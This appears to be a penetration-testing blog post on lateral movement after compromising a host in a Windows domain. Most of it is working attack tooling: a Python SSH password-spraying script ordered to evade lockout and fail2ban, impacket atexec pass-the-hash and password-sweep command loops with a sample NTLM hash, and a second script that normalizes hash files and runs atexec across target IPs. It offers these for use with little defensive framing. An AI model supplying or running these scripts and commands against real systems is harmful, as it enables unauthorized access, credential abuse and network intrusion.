Preface
Once you have compromised a machine inside a domain, you need to expand that foothold further, which means moving laterally. Lateral movement is built on the results of information collection, so information collection is very important. Remember that.
Several implementation methods are recommended:
- Attack the operating system with an existing exploit, such as MS17-010, MS08-067, etc.
- Brute-force passwords against SSH, or against the SMB service; the SMB side can be done with the impacket tools.
- Exploit RCE vulnerabilities in server-side applications, such as middleware vulnerabilities in Tomcat and the like.
- Forge a golden ticket for lateral movement; this can be done with the impacket and mimikatz tools.
- Use Windows built-in commands to control the other host remotely.
- Attack sensitive ports.
Implementation
Use an exploit to attack the operating system
This part mainly relies on accumulated experience. Based on the target's operating system, download the matching exploit online and attack with it; of course, you can also write the exploit yourself.
Use password brute-forcing
If you want to attack a Linux host, SSH brute-forcing is a good method. Writing a Python script for it yourself is fairly simple.
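The kind of script the text has in mind, as an added example that is not the author's code: a password-spraying loop for SSH. The real login attempt uses the paramiko library (assumed to be installed); the loop itself only needs an attempt(host, user, password) callable, so the spraying logic can be exercised against a fake authenticator without any network. Hosts and the wordlist in the main block are constructed.

```python
#!/usr/bin/env python3
"""Added example, not the author's script: a minimal SSH password-spraying
loop of the kind the text suggests writing yourself. The real login attempt
uses the paramiko library (assumed to be installed); the loop itself only
needs an attempt(host, user, password) -> bool callable, so it can be run
against a fake authenticator without any network."""
import socket
import time
from typing import Callable, Dict, Iterable, Tuple

try:
    import paramiko  # assumption: pip install paramiko
except ImportError:
    paramiko = None  # spray() still works with a custom attempt()

Attempt = Callable[[str, str, str], bool]


def ssh_attempt(host: str, user: str, password: str,
                port: int = 22, timeout: float = 5.0) -> bool:
    """Try exactly one SSH password login. True only on successful auth;
    transport errors (host down, banner timeout) are counted as a miss here."""
    if paramiko is None:
        raise RuntimeError("paramiko not installed; pass a custom attempt()")
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(host, port=port, username=user, password=password,
                       timeout=timeout, banner_timeout=timeout,
                       allow_agent=False, look_for_keys=False)
        return True
    except paramiko.AuthenticationException:
        return False
    except (paramiko.SSHException, socket.error):
        return False
    finally:
        client.close()


def spray(hosts: Iterable[str], users: Iterable[str], passwords: Iterable[str],
          attempt: Attempt = ssh_attempt, delay: float = 0.0) -> Dict[Tuple[str, str], str]:
    """Password-major order: every (host, user) pair sees password N before any
    pair sees password N+1, so per-account failure counters (lockout policy,
    fail2ban) grow as slowly as possible. Once a password works for a pair it
    is not tried again. Returns {(host, user): password}."""
    hosts, users = list(hosts), list(users)
    found: Dict[Tuple[str, str], str] = {}
    for password in passwords:
        for host in hosts:
            for user in users:
                if (host, user) in found:
                    continue
                if attempt(host, user, password):
                    found[(host, user)] = password
                if delay:
                    time.sleep(delay)
    return found


if __name__ == "__main__":
    # Constructed sample targets and wordlist, not real hosts.
    hits = spray(["192.168.1.10", "192.168.1.11"], ["root", "admin"],
                 ["123456", "password", "admin"], delay=1.0)
    for (host, user), pw in hits.items():
        print(f"{user}@{host} : {pw}")
```

The loop order is the point: iterating passwords in the outer loop keeps each account's consecutive failures low, which matters on hosts with account lockout or fail2ban; the delay argument slows the sweep further when needed.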
If you are attacking a Windows host, password brute-forcing also works. The concrete way is to use the impacket tools:
Pass-the-hash verification across the intranet machines; ips.txt holds the intranet IPs, one per line:
FOR /F %i in (ips.txt) do atexec.exe -hashes :3dbde697d71690a769204beb12283678 ./administrator@%i whoami
Hash traversal against a specified host; hashes.txt holds the known NTLM hashes, one per line:
FOR /F %i in (hashes.txt) do atexec.exe -hashes %i ./[email protected] whoami
The hash format inside the file must be ":nthash" or "lmhash:nthash"; if you only have the NT hash, remember to prepend the colon ":", otherwise impacket cannot split the value into its LM and NT halves.
Password traversal against a specified host; passwords.txt holds the known passwords, one per line:
FOR /F %i in (passwords.txt) do atexec.exe ./administrator:%[email protected] whoami
Password verification across the intranet machines with one fixed password; ips.txt holds the intranet IPs, one per line:
FOR /F %i in (ips.txt) do atexec.exe ./administrator:123@%i whoami
Two things to keep in mind: the %i form is for an interactive cmd prompt, inside a .bat file it must be written %%i; and atexec runs the command through the target's Task Scheduler service, so the account you use needs local administrator rights on the target.
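The same credential-by-target sweep as the FOR loops above, as an added example that is not the author's code, with the hash file validated first because the leading-colon pitfall is the usual cause of "impacket rejects my hash". It assumes impacket's atexec.py is on PATH (run_all() only wraps it in subprocess); the sample hash file and the target IPs are constructed.

```python
#!/usr/bin/env python3
"""Added example, not the author's code: the same credential-by-target sweep
as the FOR loops above, but with the hash file validated first. impacket's
-hashes option expects LMHASH:NTHASH, so a bare NT hash must get a leading
colon or the option cannot be split into its two halves. Assumes impacket's
atexec.py is on PATH; run_all() is only a thin subprocess wrapper around it."""
import re
import shlex
import subprocess
from itertools import product
from typing import Dict, Iterable, List, Optional, Tuple

HEX32 = re.compile(r"^[0-9a-f]{32}$")

# Constructed sample hash file (mixed formats), not real credentials.
SAMPLE_HASH_FILE = """# nt only, colon missing
3dbde697d71690a769204beb12283678
# nt only, colon present
:3DBDE697D71690A769204BEB12283678
# full lm:nt pair
aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678
"""


def normalize_hash(entry: str) -> str:
    """Accept 'nthash', ':nthash' or 'lmhash:nthash' and return 'lmhash:nthash'
    (LM part possibly empty), lower-cased. Raises ValueError on anything else."""
    entry = entry.strip().lower()
    lm, nt = entry.split(":", 1) if ":" in entry else ("", entry)
    if lm and not HEX32.match(lm):
        raise ValueError(f"bad LM hash: {lm!r}")
    if not HEX32.match(nt):
        raise ValueError(f"bad NT hash: {nt!r}")
    return f"{lm}:{nt}"


def load_hashes(lines: Iterable[str]) -> List[str]:
    """Normalize every non-empty, non-comment line; drop duplicates, keep order."""
    out: List[str] = []
    for line in lines:
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        h = normalize_hash(line)
        if h not in out:
            out.append(h)
    return out


def build_commands(targets: Iterable[str], hashes: Optional[List[str]] = None,
                   passwords: Optional[List[str]] = None, user: str = "administrator",
                   domain: str = "", command: str = "whoami") -> List[List[str]]:
    """One atexec.py argv per (credential, target), credential-major like the
    FOR loops. An empty domain gives the './' prefix used on the page."""
    if (hashes is None) == (passwords is None):
        raise ValueError("give exactly one of hashes or passwords")
    prefix = f"{domain}/" if domain else "./"
    cmds: List[List[str]] = []
    if hashes is not None:
        for h, t in product(hashes, targets):
            cmds.append(["atexec.py", "-hashes", h, f"{prefix}{user}@{t}", command])
    else:
        for p, t in product(passwords, targets):
            cmds.append(["atexec.py", f"{prefix}{user}:{p}@{t}", command])
    return cmds


def run_all(cmds: List[List[str]], timeout: float = 60.0) -> Dict[str, Tuple[Optional[int], str]]:
    """Run each argv without a shell (no quoting trouble with odd passwords)
    and collect (returncode, combined output) keyed by the printable command."""
    results: Dict[str, Tuple[Optional[int], str]] = {}
    for argv in cmds:
        key = " ".join(shlex.quote(a) for a in argv)
        try:
            proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
            results[key] = (proc.returncode, proc.stdout + proc.stderr)
        except (FileNotFoundError, subprocess.TimeoutExpired) as exc:
            results[key] = (None, str(exc))
    return results


if __name__ == "__main__":
    hashes = load_hashes(SAMPLE_HASH_FILE.splitlines())
    for argv in build_commands(["192.168.1.10", "192.168.1.11"], hashes=hashes):
        print(" ".join(shlex.quote(a) for a in argv))
```

The commands are built as argv lists and run without a shell, so a password containing quotes or metacharacters does not break the sweep; the hash file is deduplicated after normalization so the same NT hash written with and without its colon is only tried once per target.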
For more detail, see my impacket command summary.
Exploit vulnerabilities in server-side applications
Examples of this will be explained one by one in later articles.
Golden ticket
See my articles on golden ticket techniques:
Creating and using golden tickets
Summary of commonly used mimikatz commands
Summary of impacket commands
Use Windows built-in commands to control the other host remotely
The following two articles describe this in more detail:
Windows remote command execution
Common Windows shortcut commands
Attack on sensitive ports
You can start with my summary of common attack methods for sensitive ports; I will write dedicated articles on the corresponding knowledge points later.
Appendix: post-exploitation information collection
My two articles cover it:
Windows information collection and intranet positioning
Linux post-exploitation information collection